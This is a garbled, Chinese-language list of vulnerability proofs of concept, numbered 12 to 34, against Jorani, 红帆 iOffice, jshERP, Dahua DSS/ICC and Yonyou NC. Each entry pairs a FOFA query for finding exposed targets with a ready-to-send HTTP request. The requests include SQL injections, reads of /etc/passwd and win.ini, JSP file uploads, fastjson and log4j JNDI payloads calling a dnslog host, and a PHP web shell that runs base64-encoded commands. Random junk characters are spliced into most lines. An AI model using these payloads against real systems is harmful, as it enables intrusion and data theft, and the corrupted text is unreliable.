1 t1 M( p2 y7 W- O: [GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
# K8 }1 p& M4 }1 G+ S5 O/ jHost: 127.0.0.1
: B. G9 v2 j& A6 P2 v2 DPragma: no-cache
! o4 `- n9 Z4 b, w: P# r2 s: j& _7 xCache-Control: no-cache* x, r* T) w9 m
Upgrade-Insecure-Requests: 1  |, P/ ]5 O5 x1 D$ b- K7 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 L7 c7 x* {- J" w1 E5 }. g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, u! C# k1 b2 h1 ]3 kAccept-Encoding: gzip, deflate3 q/ e9 @# d; X) v, C! S6 p
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
* i; V, W1 s; f4 EConnection: close- J' k& [3 I& Y- a" R* ]' e

1 R. s0 F3 W# S3 y9 S, k2 o0 Y2 s4 f$ D7 e
12. Jorani < 1.0.2 远程命令执行  m/ O' d2 }' G/ g2 F* D1 Y8 b" _
FOFA:title="Jorani"
( t) Y9 t2 W$ Q) S+ g3 w8 {第一步先拿到cookie. ^+ o- m( i6 V+ Z+ i8 E
GET /session/login HTTP/1.1) `7 p( B+ a9 i5 ]( p( J& a  o
Host: 192.168.190.30' C+ W; c% |( A/ s6 M9 k
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
7 N0 W% N: ?9 `' x4 a- K. wConnection: close" v) ~& C6 `% v& n9 @
Accept-Encoding: gzip
( _( T- f- c7 v2 M' ^- f3 k0 [; g' N  G  O

2 F7 V+ i1 e0 N! j% h" ~  C; P响应中csrf_cookie_jorani用于后续请求4 x  F5 j9 w6 c& V' I
HTTP/1.1 200 OK
0 m  d4 e! G; i! F7 }Connection: close
2 B! X8 k. h4 |0 U! L" r/ [Cache-Control: no-store, no-cache, must-revalidate- N3 C5 v+ q+ ]
Content-Type: text/html; charset=UTF-8
' g3 f5 ~! N8 ~% t8 b" oDate: Tue, 24 Oct 2023 09:34:28 GMT9 V$ p/ z9 b+ D, d9 y
Expires: Thu, 19 Nov 1981 08:52:00 GMT: _3 k2 h  D7 b
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
/ Z7 q& w; q, ?+ O/ vPragma: no-cache* a% _1 i0 A2 O4 [" {8 Y" V
Server: Apache/2.4.54 (Debian)
: Q! _$ s6 \5 \3 }1 ZSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
: |, s1 h! F2 N$ R. D- [Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
; ^$ Z/ S! d# j9 f' R; s" FVary: Accept-Encoding, ~- q* z! C& ?9 ?3 n
0 o9 U1 T' y9 Y3 V* ~4 g
8 L% t+ k' O- o2 j0 M
POST请求,执行函数并进行base64编码" w# \& N% _- ?
POST /session/login HTTP/1.1% M- K: W! Z7 j; F0 B  S% e1 a
Host: 192.168.190.30
! Z; F- ~, \* S0 L$ RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
% v* u! u8 F1 {Connection: close) e, v1 N  @" P; W3 v% Z
Content-Length: 252: E$ r, G+ \2 P( f# c- D* \
Content-Type: application/x-www-form-urlencoded
( S; e( J1 q/ r* {0 R* oCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
+ L* y% q# f" ^5 C6 kAccept-Encoding: gzip2 K2 C$ A2 h- |5 I. }
/ l( z. z# ^% d8 j  |
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
* I7 Q; u: |! |! q9 c/ @- A- o- ^. q3 x$ `9 N) m2 L

2 n6 \* Q3 g) j' s' V( ^
4 k" m7 g0 T: u. F/ r& t向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
2 V+ z+ {: F, `. Y6 b* Q5 A  yGET /pages/view/log-2023-10-24 HTTP/1.1
* i- Q! L/ [' h' ~7 GHost: 192.168.190.30
1 F: s" j: {8 W- ^3 a. q$ S2 ~$ EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36+ D1 H9 W  |$ K0 I$ p
Connection: close0 k, V" S) k: [& i% U( W) I6 j
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r, S# g1 ]9 B, R+ t* {9 V( ?
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
  S" ~. T( I3 ZX-REQUESTED-WITH: XMLHttpRequest) i, y. M" n: w7 C& ?
Accept-Encoding: gzip
4 Y  S1 w5 C5 b6 g+ C5 m2 b1 n( {7 J1 ~; f: t
' C' x" C& g; C4 {% p2 T
13. 红帆iOffice ioFileDown任意文件读取* a  ]# V. s7 c5 S+ c% k& C
FOFA:app="红帆-ioffice"
0 q, x) y& M. J5 R- E2 y( I. l9 `GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.17 t2 k% X% E- e( N' q/ v
Host: x.x.x.x
+ `, a2 X2 u! s# p( m- kUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ w; z% c5 `3 `( a
Connection: close
/ l* X8 j+ P) Q( D* V1 F/ n9 }Accept: */*
. x/ [+ O3 m! |Accept-Encoding: gzip3 V: n: I: o& d

% C. U* T8 c1 L9 {' K
5 n8 _  F: u( z  @) J" h: C14. 华夏ERP(jshERP)敏感信息泄露" e8 P/ C; Q; r/ H, }* J) c
FOFA:body="jshERP-boot"4 W1 F  _1 h2 z3 x7 b7 G; X
泄露内容包括用户名密码" I) {4 |  n& \  z
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
: H, D% `5 |# r$ W1 M% p8 B3 mHost: x.x.x.x' [% ?" N8 K* S4 ^! w% d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
6 p/ s2 E, ]' ^+ d' sConnection: close3 {6 A) f) _9 L+ ^: u6 e
Accept: */*1 |/ C) F) @% U7 g
Accept-Language: en: n, M" P9 P7 r' A
Accept-Encoding: gzip( M, l2 ]' x- u& @4 M
3 P( `9 U$ p& K5 c
# K# @5 D" x+ Z7 P  q+ d
15. 华夏ERP getAllList信息泄露: X7 ^9 c  I0 z# Q/ ?) C% p  h
CVE-2024-04902 ~2 J+ v* L& A* t! o: b
FOFA:body="jshERP-boot"
8 L# C, `# d7 X: e& R泄露内容包括用户名密码! }- _7 v  B* b8 O! K
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.17 y% `1 w, \7 R9 c# i% R- S8 D
Host: 192.168.40.130:100  [) y. n# }+ K0 p+ ^! }, g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36, c' G+ |5 ]0 I4 ~. G7 C6 g
Connection: close
3 I  ?0 W/ [( KAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.83 h/ O* {. ?9 J" V: @) g
Accept-Language: en
, E+ V9 W% r- ?7 ~' L0 `4 @- wsec-ch-ua-platform: Windows
$ e! I6 j8 }' _* ?# N6 c/ YAccept-Encoding: gzip
7 x5 w0 `7 }0 t: }* z6 H+ z
" z0 Q/ J" G: a+ d* `* x6 H
8 W# X: a1 K3 V$ X5 r16.  红帆HFOffice医微云SQL注入
9 V" r7 k9 H: v4 m7 xFOFA:title="HFOffice"
- I& O) D6 ~1 @" K" O: O2 {' apoc中调用函数计算1234的md5值& v2 _* ?4 W, C9 h
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
! a. V8 A7 [% L9 D1 BHost: x.x.x.x: G' T' P. z! i
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
/ ^& e' I- n5 ]2 YConnection: close& I1 V& y, H  C' D, g
Accept: */*
* U2 r5 }7 p8 x. dAccept-Language: en
7 n( o4 B! x# A" T: Y8 A1 @( p4 i. qAccept-Encoding: gzip
3 p4 q# b' M' r) A
2 W3 c9 x7 e: v, z% E! r  X2 [
9 b% [1 l- T0 ~17. 大华 DSS itcBulletin SQL 注入
  v. S& F6 h4 f+ q. OFOFA:app="dahua-DSS"0 G) U0 N# T& q: a0 c
POST /portal/services/itcBulletin?wsdl HTTP/1.1
0 ?2 u' N' O6 F; j9 y, THost: x.x.x.x
9 y5 m: S* ~' LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' Q: v8 d; n2 p2 J
Connection: close7 A) x% \) I5 {
Content-Length: 345
+ s! {% N5 t  y! Y3 NAccept-Encoding: gzip
+ r2 o2 I: z; t' L1 A7 n0 {
' ]1 o$ w" R, V9 q<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
1 d+ c' K  T: ^4 m8 i<s11:Body>
) |* N7 A( H7 \' u/ U3 z$ v    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>7 ?- p$ V5 }; u7 o8 Y
      <netMarkings>
) {, |+ G6 I( R1 S1 E7 Z       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=16 f$ [# r/ @% M8 G  X6 B+ J
      </netMarkings>+ H1 K. h5 r& d" v
    </ns1:deleteBulletin>8 p% j2 ?8 i. Z
  </s11:Body>% M0 s( p7 F" l6 z
</s11:Envelope>
' ?( i6 S& R- d+ _* x
4 Q$ }! ]4 K3 e5 i0 s+ Y9 I0 R+ F. f/ d9 U
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露. f4 c6 `% w, Q3 k4 Y3 ^
FOFA:app="dahua-DSS"# W# S9 u* p4 }  m% T. }( O
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
$ }+ M1 c) i( HHost: your-ip3 J) j! a1 F! y9 N( C1 q/ _1 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( E5 K# T, N5 ?8 C4 ?2 v5 SAccept-Encoding: gzip, deflate
3 ]& H( ^; V1 f# S) c$ M! \Accept: */*
! f  v" ^- Y3 s6 w# ?$ d- X* Y' D- ?Connection: keep-alive
$ n! s! k- r) f* N' ]; |" U' k  e2 y  G5 h3 k& Q

- G9 f0 G1 ]( }, r/ M
& o1 z+ U* Z; a# P  g. S19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入  l, d7 x  n7 x. c
FOFA:app="dahua-DSS"/ c5 D! i# _' [. ?# c7 @  Y
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
$ |  M6 Y1 }3 N$ pHost:6 X* O: z; b- h( A2 p* |! h
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, A; O& F. v3 X8 eAccept-Encoding: gzip, deflate6 `1 T7 ]0 o! x) m1 x
Accept: */*6 w" j. ]& b" I- K% R3 c6 {
Connection: keep-alive( J: q6 A8 M4 E1 [) l

8 E+ N! l% V/ E/ A) f1 g5 }3 t, N0 {8 D
20. 大华ICC智能物联综合管理平台任意文件读取
/ J9 j+ E/ f' {4 {- l* P( QFOFA:body="*客户端会小于800*"
. J  Z' u3 u% q7 v( B3 PGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
% @4 z: B& h1 v' }6 C4 w* UHost: x.x.x.x
3 V# x9 Z% T3 B; uUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ M: R1 T, \9 G9 W1 \4 x( I+ a
Connection: close; J$ @7 K7 |& B
Accept: */*
  W9 g) {1 \/ |1 y% cAccept-Language: en
- S1 g: O# e: {; lAccept-Encoding: gzip
: a& i/ }6 x/ k1 K
! d5 [& Z7 b3 p9 v2 b% ?- d3 D& l" Y( y! O6 j
21. 大华ICC智能物联综合管理平台random远程代码执行5 M: B/ Y+ I5 P3 ]
FOFA:icon_hash="-1935899595"$ T" @! k/ h1 s$ `' a' P
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1# d+ s3 N3 j, w: y* w9 P
Host: x.x.x.x
. x! e( _$ [* E6 k' z% IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 C! D+ a; P6 dContent-Length: 161
, i* a( B, w4 t1 U+ x8 D* nAccept-Encoding: gzip
: p8 u! u: ~% U  d8 c6 A- CConnection: close
  b9 p  R/ J; x0 W/ N7 m" xContent-Type: application/json;charset=utf-8& B  V. m; q! O2 ?7 k' ]" \% F
( ?1 D% O5 Q: H, p! i( ^4 h" L
{
) O" |* Y# s. r0 N"a":{; E- h; V, c& k, t9 {
   "@type":"com.alibaba.fastjson.JSONObject",
) }% G4 q% ]# ~' O    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
) W) O9 ^7 f% c, y) O$ v  R- n  }""
! g6 i/ x* J1 a( z& G# R$ J}
7 @: `9 \6 R4 d6 l* O# N2 D! H1 H+ v: N5 N

5 c7 n# r  c& F8 ^2 _" B22. 大华ICC智能物联综合管理平台 log4j远程代码执行
6 s' V3 g/ x% ]5 n: e+ B  w% mFOFA:icon_hash="-1935899595"
8 {% U2 w5 s" G: u" C6 ~! R5 \POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
0 h3 O- s9 i0 P; BHost: your-ip) E# m8 P- E2 W4 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( q! z! Y7 H2 U- j. m+ a2 L3 y* w
Content-Type: application/json;charset=utf-81 c) a4 A" T2 h+ U) S3 G# P9 Z% C

! M' v; K9 m: G8 x  j' W{
# _5 y! y" h; N; _: P"loginName":"${jndi:ldap://dnslog}"+ V4 s; P5 C6 ~" {
}
/ [' \4 Z& l* `2 ^7 |) T2 N9 c; s6 e- K0 c* l

- k8 ?9 V. m/ W8 _
/ Z+ e! t: X% ?& I* U4 y+ x23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
7 c" B4 h" w5 M& _/ W" d" uFOFA:icon_hash="-1935899595"
9 n' s% k! y* G: W* f' k/ z& c  UPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
* H7 c! g; c% C. j: J+ WHost: your-ip
$ U% `- a  l4 E( CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 a0 Y  G; H, G+ X0 b4 X
Content-Type: application/json;charset=utf-89 a$ v8 q' `; e) K! h
Accept-Encoding: gzip
5 i& U6 {! _5 j) m1 OConnection: close
" b6 y1 ~( N1 \( R/ C/ B7 i
% `+ U  ?: s! J& I0 H4 o{
/ P" v! J9 ?5 _( D) a    "a":{
4 b% V) k) L# y+ H5 ?1 C        "@type":"com.alibaba.fastjson.JSONObject",4 B5 h+ K$ Z' d/ a$ Y( B# E' }; H
       {"@type":"java.net.URL","val":"http://DNSLOG"}) L8 Z: C3 p) y# B  e
        }""
. w) o# o3 g) l- r' L$ {}
; W! S4 K3 k# E
9 u& g3 H- z5 O( B4 I7 G
7 d( p3 T2 f7 q& [( M24. 用友NC 6.5 accept.jsp任意文件上传
. w: f3 E! \& @& ?" s0 RFOFA:icon_hash="1085941792"7 p3 }+ }+ P! R2 A1 k0 M$ o( G) y
POST /aim/equipmap/accept.jsp HTTP/1.1
7 t8 q6 R! {# f7 b* nHost: x.x.x.x
; `& f3 }" D+ [4 @0 Q4 ]User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
4 ~& u9 }3 {  S, [- l  y2 WConnection: close0 w! h! n: a* D- ~
Content-Length: 449; i4 h3 s3 C8 y6 D& L
Accept: */*
' X0 O& I7 x* T3 X5 i- J9 S* kAccept-Encoding: gzip
* l- y# I( U& ^; P% ~( z( _0 YContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% j1 z5 @& V1 L8 e) P
$ Q* {0 q+ ], B+ j* K-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
# C4 X6 w7 T0 r8 l6 x5 _+ T6 u6 _* WContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"# Q; ?$ q' {  i" |. }
Content-Type: text/plain, [1 V; L1 |0 ~9 r

/ r' m( c5 g( N9 P<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>( N( K3 L# `7 Y- S
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
' Q9 A7 B+ M" ~; vContent-Disposition: form-data; name="fname"
! Z! [5 F+ t, A+ J, P) F3 ~2 ^/ q5 q/ v
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
) G4 s% f7 y+ Z1 `( p-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
/ G& i& h1 C: {. S
( ]0 G) w1 @7 j8 Y4 n4 A9 l8 g9 T. j5 p  X, T# X) ]) H) R
25. 用友NC registerServlet JNDI 远程代码执行- X% c6 X) z7 C' q: J
FOFA:app="用友-UFIDA-NC"
( C2 p8 ^* R' s2 C2 {/ c, mPOST /portal/registerServlet HTTP/1.1
7 Y1 w1 h6 e* Z" }8 `( j! O6 o1 RHost: your-ip
4 ^4 C4 l6 [7 B% m& E& BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
1 O$ n2 u: {3 M% h& u8 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
5 W) U0 Z: S( M3 X# W% R. sAccept-Encoding: gzip, deflate! {7 l0 Q8 [/ `& Z: S
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
% H9 E, f  ~0 V  @: ?% S& vContent-Type: application/x-www-form-urlencoded
3 t- j  q1 B) B1 O1 N$ ]* X8 F! h2 i: r
type=1&dsname=ldap://dnslog( ?! {; p/ D6 U

( E1 w$ T! z, Q3 x# ^
1 p4 U4 y+ |: r
* j  X2 F$ c6 ^( Z& n1 n8 D5 o26. 用友NC linkVoucher SQL注入1 Y9 h# {7 g8 l- e4 Z! y9 v
FOFA:app="用友-UFIDA-NC"
+ D% S9 y1 k0 y  n- n' VGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ l: _$ o$ t; P. W& k! `4 RHost: your-ip
0 x/ {8 s8 z' Y- B! R( g4 X8 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- ]: W- t' K. f- v' AContent-Type: application/x-www-form-urlencoded
$ T7 a2 e  b3 y& c) u' E: m6 bAccept-Encoding: gzip, deflate
+ E6 X- ^, y6 ?) L2 F$ `1 u; j3 _1 cAccept: */*+ R1 @( R1 F3 r+ F/ U
Connection: keep-alive) |" v4 t2 K* N6 X+ R' G% r9 F7 P

( d6 G0 Q" H* L: P! p
* v& |7 ~3 ^- I" p# b' R27. 用友 NC showcontent SQL注入8 l; m6 V& g5 ^  G3 ?" t. w8 E
FOFA:icon_hash="1085941792"4 D4 H$ K9 B  Z# P
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.10 e* A: r6 e; d7 s
Host: your-ip
$ z" m: K9 ^- v1 [3 i0 P" v% y1 g. @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 i& L$ X! W( `: B5 b
Accept-Encoding: identity+ C7 F$ x' j4 {0 a
Connection: close( o  Z/ U  O! M' `& f
Content-Type: text/xml; charset=utf-86 N8 b7 B  t) O4 W

# s& H* M* |; G1 c" N3 K6 j, u; }" E" p
28. 用友NC grouptemplet 任意文件上传; @5 m$ L2 E# |3 b/ F2 x, o
FOFA:icon_hash="1085941792"9 }: J7 E2 J" v- U4 k4 T; B5 N
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
1 L; [( n% t1 W5 Q- }0 v  G; FHost: x.x.x.x
' ^+ E2 ?/ y5 k; U9 Q+ xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.363 V+ |. T- J! f# Q: l% L# V
Connection: close
( i) Z$ a$ v4 }9 p) n! X9 e  @Content-Length: 2683 B+ ^4 X) o% H8 Q! A/ w
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk/ s( U) E9 J2 h; u2 z
Accept-Encoding: gzip
/ Z: p% G; A, W7 y  D- \9 q; I
" o4 S! f* M+ Y! X6 L0 h2 f------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
( x: ^* q6 [7 a( A! BContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
. n# ^2 h$ E+ G, X, h0 L/ _Content-Type: application/octet-stream
" v$ s8 J" v4 Z( y4 a6 u' P" i% E, ?; |+ r# q
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
1 m# H' e& r4 a& L8 P------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--# P; W0 y& `- }3 v" }, p& ~% A
4 k( [' g* B5 R% H& H

& j% l$ [5 x+ ?$ z/uapim/static/pages/nc/head.jsp
9 y1 [) m: k8 t+ M% K% I
  V& o8 p4 A9 u  e29. 用友NC down/bill SQL注入* N3 g- J# h& L( v: i- D$ e
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"# t/ T* x7 U$ I8 e- E: j, }
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1, f$ {, k. F; I7 F( r/ v0 z0 D
Host: your-ip
$ k. B) W! Y8 D! O1 C& CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" O: G' Y% y) K1 ?9 T
Content-Type: application/x-www-form-urlencoded
! S& g% _& |  A  T8 C- NAccept-Encoding: gzip, deflate7 ^( u. N- D2 B) `: B+ t" U
Accept: */*
; _& k1 {6 o0 q  P: ~Connection: keep-alive
2 W& M) N! v  B4 h
: k9 u4 R/ B" J  O9 e/ w5 \( _* X- I! l- }4 u  e& \0 A
30. 用友NC importPml SQL注入# S+ f5 m1 n% H
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"' A1 t2 i! K- X/ U8 x
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1) M: Z; r/ i! |* y- Y" c: [
Host: your-ip9 _: c( H& j; i) ~( o0 B5 S: ]6 {2 C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V) Q) Q' E2 d) J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36) s% j# @" m# {- Y" v/ ]8 N+ L
Connection: close
+ T6 Y" Q' i( p! Z- ?1 i
4 s9 F6 R$ |' S+ D+ D------WebKitFormBoundaryH970hbttBhoCyj9V
5 ?8 b) G) M# q" h% \7 QContent-Disposition: form-data; name="Filedata"; filename="1.jpg"" x1 f9 e: i3 T% m8 x/ O: d4 [
Content-Type: image/jpeg% \3 J1 l  h* p
------WebKitFormBoundaryH970hbttBhoCyj9V--9 k! d. s0 {/ |. i! }+ U
8 A+ N9 d. r# w* O; v1 X
6 _; E; _9 c! e( U6 c" h
31. 用友NC runStateServlet SQL注入6 _0 Y" W0 {, k( w4 G( g
version<=6.5
' y, {- P3 x0 mFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& j2 l: @5 o& M: V* \4 h3 f7 x2 c$ K+ D: y
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
7 Z2 d* q' F; g6 L' D9 {Host: host) P+ P' _) n3 n3 O6 a- r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36+ }# F; i; E+ D/ g% |! r
Content-Type: application/x-www-form-urlencoded. E0 r* {5 V& G0 i! U1 P3 U
: \" r3 X* c3 G' x% F0 L9 F4 p5 y
' ^, \/ e2 L$ i5 r4 Q" o
32. 用友NC complainbilldetail SQL注入* M# ^- d8 U' X9 {
version= NC633、NC65
1 m( ?' {' A; NFOFA:app="用友-UFIDA-NC"& R$ I4 W+ E" m( P6 G
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ O  [$ b8 b4 }Host: your-ip
2 i9 U, o; O6 m" S3 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 j, i' G$ L0 E( M( w5 w5 `Content-Type: application/x-www-form-urlencoded5 m1 K, D+ Q; f: r: v3 a- B3 [
Accept-Encoding: gzip, deflate
4 G' n+ _( i. P! y5 nAccept: */*
" q5 x6 g5 |; F; y( e: PConnection: keep-alive0 K9 d% b" Q0 c" B7 c( i

3 e5 m) r- T  M* U4 P( {8 h
+ d' L' j. K6 p* F8 _33. 用友NC downTax/download SQL注入
" z2 o  q( {: m2 S9 I2 J6 V  V2 iversion:NC6.5FOFA:app="用友-UFIDA-NC"
( n& k* C' w" \7 i( o" qGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ f: \. s/ A: r* r
Host: your-ip
) ?! a) `5 R9 p& c0 x8 k' z& AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: e- Q6 V  j2 k8 ]
Content-Type: application/x-www-form-urlencoded9 K$ \: Z5 |/ M% k! N$ S
Accept-Encoding: gzip, deflate
1 g' O, M' |" c; X% [Accept: */*7 Q/ h3 [  R  d; u5 E. x4 T; K
Connection: keep-alive5 g/ c& [& A0 v$ d( |& \& g; N7 O

( U6 W9 Y3 B; T# a' Y( {# |& J& [3 l0 K% w4 b
34. 用友NC warningDetailInfo接口SQL注入& v* U" P: |/ J5 |/ X
FOFA:app="用友-UFIDA-NC"/ u1 B" W8 \3 r- J% Y  s4 {& h& ^
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1% ]. n2 V6 l, d2 u9 M
Host: your-ip
2 w: }$ d5 M' x, c0 G. t5 {8 R0 v' xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 x/ M/ {6 l& G
Content-Type: application/x-www-form-urlencoded, C9 p' t! C; @; x% z
Accept-Encoding: gzip, deflate
1 L' Q3 J0 J( u& [9 u: i+ EAccept: */*
. R6 K; c: S* q( f# ~Connection: keep-alive
  m4 C  Q. O( t# g
2 o" ?6 ]& O( M. `0 W" C) l" ^/ }) z  z6 T) s: d5 E
